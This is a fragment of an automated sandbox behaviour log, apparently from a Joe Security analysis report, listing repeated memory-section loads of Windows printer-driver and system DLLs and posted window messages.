    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523346939
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523362613
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523371214
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523373738
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523376330
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523394715
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523403375
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523429375
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523431876
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523446693
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523455349
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523457985
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523476963
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: write and read and execute Type: commit Baseaddress: 2F20000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 523494024
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: query and write and read and execute Type: image Baseaddress: 69310000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 523496691
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523504583
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523513024
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523515357
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523517561
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523531647
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523540097
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523542441
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523544821
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523558865
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523567637
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523569999
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523572780
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: write and read and execute Type: commit Baseaddress: 1D90000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 531421658
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: query and read Type: commit Baseaddress: 1D90000 Size: 200704 Protection: readonly Mapped to pid: own pid success or wait 531425462
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: write and read and execute Type: commit Baseaddress: 1D90000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 531429866
    Section loaded Path: C:\Program Files\Common Files\System\ado\msadox.dll Access: query and read Type: commit Baseaddress: 1D90000 Size: 200704 Protection: readonly Mapped to pid: own pid success or wait 531431976
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: execute Mapped to pid: own pid success or wait 531448606
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: query and read Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: readonly Mapped to pid: own pid success or wait 531452550
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: execute Mapped to pid: own pid success or wait 531468107
    Section loaded Path: C:\Program Files\Messenger\msmsgs.exe Access: query and read Type: commit Baseaddress: 2B20000 Size: 1695744 Protection: readonly Mapped to pid: own pid success or wait 531470228
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 549816878
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 549849168
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 550375178
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 550619698
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 562736260
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 575167317
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 575368955
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 587548030
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 600708778
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 600748468
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 613570676
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 613811322
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 625854965
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 688220306
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 688707957
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 688909149
    Section loaded Path: \BaseNamedObjects\MSCTF.Shared.SFM.MAB Access: query and write and read Type: reserve Baseaddress: 1D90000 Size: 524288 Protection: read write Mapped to pid: own pid success or wait 691542707
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 701046757
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 752183198
    Message posted HWND: 2017C Message: 402 WParam: 0 LParam: 0 success 789956247
    Message posted HWND: 101B6 Message: 402 WParam: 0 LParam: 0 success 790821212
    Message posted HWND: 10180 Message: 402 WParam: 0 LParam: 0 success 815804142
    Copyright 2011 Joe Security | All rights reserved | www.joesecurity.org | This page is optimized for firefox - 1024x786